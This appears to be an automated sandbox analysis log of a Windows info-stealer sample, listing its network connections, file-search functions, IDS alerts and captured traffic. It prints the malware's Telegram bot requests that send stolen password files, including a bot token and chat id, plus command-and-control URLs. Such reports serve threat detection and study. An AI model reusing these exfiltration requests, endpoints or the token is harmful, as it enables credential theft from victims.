Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49733 version: TLS 1.2 |
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49642 version: TLS 1.2 |
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49643 version: TLS 1.2 |
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49649 version: TLS 1.2 |
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49650 version: TLS 1.2 |
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49651 version: TLS 1.2 |
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49652 version: TLS 1.2 |
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49653 version: TLS 1.2 |
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49654 version: TLS 1.2 |
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49655 version: TLS 1.2 |
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49656 version: TLS 1.2 |
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49657 version: TLS 1.2 |
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49658 version: TLS 1.2 |
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49659 version: TLS 1.2 |
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49660 version: TLS 1.2 |
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49661 version: TLS 1.2 |
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49662 version: TLS 1.2 |
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49663 version: TLS 1.2 |
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49671 version: TLS 1.2 |
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49672 version: TLS 1.2 |
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49673 version: TLS 1.2 |
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49674 version: TLS 1.2 |
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49676 version: TLS 1.2 |
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49680 version: TLS 1.2 |
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49682 version: TLS 1.2 |
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49683 version: TLS 1.2 |
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49695 version: TLS 1.2 |
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49696 version: TLS 1.2 |
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49697 version: TLS 1.2 |
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49698 version: TLS 1.2 |
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49699 version: TLS 1.2 |
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49700 version: TLS 1.2 |
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49701 version: TLS 1.2 |
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49702 version: TLS 1.2 |
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49703 version: TLS 1.2 |
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49704 version: TLS 1.2 |
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49705 version: TLS 1.2 |
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49706 version: TLS 1.2 |
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49707 version: TLS 1.2 |
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49708 version: TLS 1.2 |
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49709 version: TLS 1.2 |
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49710 version: TLS 1.2 |
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49711 version: TLS 1.2 |
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49712 version: TLS 1.2 |
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49713 version: TLS 1.2 |
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49715 version: TLS 1.2 |
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49717 version: TLS 1.2 |
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49719 version: TLS 1.2 |
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49721 version: TLS 1.2 |
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49723 version: TLS 1.2 |
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49725 version: TLS 1.2 |
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49727 version: TLS 1.2 |
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49729 version: TLS 1.2 |
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49731 version: TLS 1.2 |
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49733 version: TLS 1.2 |
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49735 version: TLS 1.2 |
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49737 version: TLS 1.2 |
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49739 version: TLS 1.2 |
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49741 version: TLS 1.2 |
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49743 version: TLS 1.2 |
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49745 version: TLS 1.2 |
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49747 version: TLS 1.2 |
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49749 version: TLS 1.2 |
Source: C:\Users\user\Desktop\1.exe | Code function: 0_2_00436ADE GetFileAttributesW,FindFirstFileW,FindClose, | 0_2_00436ADE |
Source: C:\Users\user\Desktop\1.exe | Code function: 0_2_00452126 FindFirstFileW,Sleep,FindNextFileW,FindClose, | 0_2_00452126 |
Source: C:\Users\user\Desktop\1.exe | Code function: 0_2_0045C999 FindFirstFileW,FindNextFileW,FindClose, | 0_2_0045C999 |
Source: C:\Users\user\Desktop\1.exe | Code function: 0_2_00434BEE FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, | 0_2_00434BEE |
Source: C:\Users\user\Desktop\1.exe | Code function: 0_2_0045DD7C FindFirstFileW,FindClose, | 0_2_0045DD7C |
Source: C:\Users\user\Desktop\1.exe | Code function: 0_2_0044BD29 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose, | 0_2_0044BD29 |
Source: C:\Users\user\Desktop\1.exe | Code function: 0_2_00436D2D FindFirstFileW,CreateFileW,SetFileTime,CloseHandle,SetFileTime,CloseHandle, | 0_2_00436D2D |
Source: C:\Users\user\Desktop\1.exe | Code function: 0_2_00442E1F SetCurrentDirectoryW,FindFirstFileW,SetCurrentDirectoryW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, | 0_2_00442E1F |
Source: C:\Users\user\Desktop\1.exe | Code function: 0_2_00475FE5 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, | 0_2_00475FE5 |
Source: C:\Users\user\Desktop\1.exe | Code function: 0_2_0044BF8D _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose, | 0_2_0044BF8D |
Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49639 -> 149.154.167.220:443 |
Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49631 -> 149.154.167.220:443 |
Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49627 -> 149.154.167.220:443 |
Source: Network traffic | Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.5:49733 -> 149.154.167.220:443 |
Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49635 -> 149.154.167.220:443 |
Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49645 -> 149.154.167.220:443 |
Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49636 -> 149.154.167.220:443 |
Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49630 -> 149.154.167.220:443 |
Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49628 -> 149.154.167.220:443 |
Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49634 -> 149.154.167.220:443 |
Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49633 -> 149.154.167.220:443 |
Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49643 -> 149.154.167.220:443 |
Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49637 -> 149.154.167.220:443 |
Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49629 -> 149.154.167.220:443 |
Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49644 -> 149.154.167.220:443 |
Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49647 -> 149.154.167.220:443 |
Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49638 -> 149.154.167.220:443 |
Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49632 -> 149.154.167.220:443 |
Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49646 -> 149.154.167.220:443 |
Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49640 -> 149.154.167.220:443 |
Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49641 -> 149.154.167.220:443 |
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org |
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org |
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org |
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org |
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:216041%0D%0ADate%20and%20Time:%2013/03/2025%20/%2007:17:50%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20216041%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive |
Source: global traffic | HTTP traffic detected: POST /bot7725135953:AAG0wKbS2-n7tDPEidVg5BSQqtxiGP9tbWY/sendDocument?chat_id=-4712085167&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd6312a955633aHost: api.telegram.orgContent-Length: 582 |
Source: global traffic | HTTP traffic detected: POST /bot7725135953:AAG0wKbS2-n7tDPEidVg5BSQqtxiGP9tbWY/sendDocument?chat_id=-4712085167&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd6341edb35386Host: api.telegram.orgContent-Length: 582 |
Source: global traffic | HTTP traffic detected: POST /bot7725135953:AAG0wKbS2-n7tDPEidVg5BSQqtxiGP9tbWY/sendDocument?chat_id=-4712085167&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd6376081fbaa6Host: api.telegram.orgContent-Length: 582 |
Source: global traffic | HTTP traffic detected: POST /bot7725135953:AAG0wKbS2-n7tDPEidVg5BSQqtxiGP9tbWY/sendDocument?chat_id=-4712085167&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd63ada00000b2Host: api.telegram.orgContent-Length: 582 |
Source: global traffic | HTTP traffic detected: POST /bot7725135953:AAG0wKbS2-n7tDPEidVg5BSQqtxiGP9tbWY/sendDocument?chat_id=-4712085167&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd63e9fbc770dfHost: api.telegram.orgContent-Length: 582 |
Source: global traffic | HTTP traffic detected: POST /bot7725135953:AAG0wKbS2-n7tDPEidVg5BSQqtxiGP9tbWY/sendDocument?chat_id=-4712085167&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd6429c7b66857Host: api.telegram.orgContent-Length: 582 |
Source: global traffic | HTTP traffic detected: POST /bot7725135953:AAG0wKbS2-n7tDPEidVg5BSQqtxiGP9tbWY/sendDocument?chat_id=-4712085167&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd647e7085e75eHost: api.telegram.orgContent-Length: 582 |
Source: global traffic | HTTP traffic detected: POST /bot7725135953:AAG0wKbS2-n7tDPEidVg5BSQqtxiGP9tbWY/sendDocument?chat_id=-4712085167&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd64c7a9c86413Host: api.telegram.orgContent-Length: 582Connection: Keep-Alive |
Source: global traffic | HTTP traffic detected: POST /bot7725135953:AAG0wKbS2-n7tDPEidVg5BSQqtxiGP9tbWY/sendDocument?chat_id=-4712085167&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd652ea9fcdfeaHost: api.telegram.orgContent-Length: 582 |
Source: global traffic | HTTP traffic detected: POST /bot7725135953:AAG0wKbS2-n7tDPEidVg5BSQqtxiGP9tbWY/sendDocument?chat_id=-4712085167&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd65a415df9222Host: api.telegram.orgContent-Length: 582Connection: Keep-Alive |
Source: global traffic | HTTP traffic detected: POST /bot7725135953:AAG0wKbS2-n7tDPEidVg5BSQqtxiGP9tbWY/sendDocument?chat_id=-4712085167&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd660f0dfa52a2Host: api.telegram.orgContent-Length: 582 |
Source: global traffic | HTTP traffic detected: POST /bot7725135953:AAG0wKbS2-n7tDPEidVg5BSQqtxiGP9tbWY/sendDocument?chat_id=-4712085167&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd66978ca909d2Host: api.telegram.orgContent-Length: 582Connection: Keep-Alive |
Source: global traffic | HTTP traffic detected: POST /bot7725135953:AAG0wKbS2-n7tDPEidVg5BSQqtxiGP9tbWY/sendDocument?chat_id=-4712085167&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd67452ff21337Host: api.telegram.orgContent-Length: 582 |
Source: global traffic | HTTP traffic detected: POST /bot7725135953:AAG0wKbS2-n7tDPEidVg5BSQqtxiGP9tbWY/sendDocument?chat_id=-4712085167&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd681b765ba4a1Host: api.telegram.orgContent-Length: 582Connection: Keep-Alive |
Source: global traffic | HTTP traffic detected: POST /bot7725135953:AAG0wKbS2-n7tDPEidVg5BSQqtxiGP9tbWY/sendDocument?chat_id=-4712085167&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd68da11a59dfdHost: api.telegram.orgContent-Length: 582 |
Source: global traffic | HTTP traffic detected: POST /bot7725135953:AAG0wKbS2-n7tDPEidVg5BSQqtxiGP9tbWY/sendDocument?chat_id=-4712085167&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd6b8497422615Host: api.telegram.orgContent-Length: 582Connection: Keep-Alive |
Source: global traffic | HTTP traffic detected: POST /bot7725135953:AAG0wKbS2-n7tDPEidVg5BSQqtxiGP9tbWY/sendDocument?chat_id=-4712085167&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd6c488cef3084Host: api.telegram.orgContent-Length: 582 |
Source: global traffic | HTTP traffic detected: POST /bot7725135953:AAG0wKbS2-n7tDPEidVg5BSQqtxiGP9tbWY/sendDocument?chat_id=-4712085167&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd6ec88bdfa508Host: api.telegram.orgContent-Length: 582Connection: Keep-Alive |
Source: global traffic | HTTP traffic detected: POST /bot7725135953:AAG0wKbS2-n7tDPEidVg5BSQqtxiGP9tbWY/sendDocument?chat_id=-4712085167&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd6fee36357fdaHost: api.telegram.orgContent-Length: 582 |
Source: global traffic | HTTP traffic detected: POST /bot7725135953:AAG0wKbS2-n7tDPEidVg5BSQqtxiGP9tbWY/sendDocument?chat_id=-4712085167&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd70fc6bb1d3ffHost: api.telegram.orgContent-Length: 582Connection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org |
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org |
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org |
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org |
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:216041%0D%0ADate%20and%20Time:%2013/03/2025%20/%2007:17:50%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20216041%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org |
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org |
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org |
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org |
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org |
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org |
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive |
Source: RegSvcs.exe, 00000001.00000002.3808692532.000000000242E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://51.38.247.67:8081/_send_.php?L |
Source: 1.exe, 00000000.00000002.1357027294.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.3807703766.0000000000142000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded |
Source: 1.exe, 00000000.00000002.1357027294.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.3807703766.0000000000142000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.3808692532.0000000002361000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://aborters.duckdns.org:8081 |
Source: 1.exe, 00000000.00000002.1357027294.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.3807703766.0000000000142000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.3808692532.0000000002361000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://anotherarmy.dns.army:8081 |
Source: RegSvcs.exe, 00000001.00000002.3811760489.0000000005A2D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://certificates.godaddy.com/repository/0 |
Source: RegSvcs.exe, 00000001.00000002.3811760489.0000000005A2D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://certificates.godaddy.com/repository/gdig2.crt0 |
Source: RegSvcs.exe, 00000001.00000002.3811760489.0000000005A2D000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.3811760489.00000000059F5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://certs.godaddy.com/repository/1301 |
Source: RegSvcs.exe, 00000001.00000002.3808692532.0000000002361000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/ |
Source: 1.exe, 00000000.00000002.1357027294.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.3807703766.0000000000142000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/q |
Source: RegSvcs.exe, 00000001.00000002.3811760489.0000000005A2D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.godaddy.com/gdig2s1-19134.crl0 |
Source: RegSvcs.exe, 00000001.00000002.3811760489.00000000059F5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.godaddy.com/gdroot-g2.crl0F |
Source: RegSvcs.exe, 00000001.00000002.3811760489.0000000005A2D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.godaddy.com/gdroot.crl0F |
Source: RegSvcs.exe, 00000001.00000002.3811760489.0000000005A2D000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.3811760489.00000000059EE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/ |
Source: RegSvcs.exe, 00000001.00000002.3807889102.0000000000658000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en |
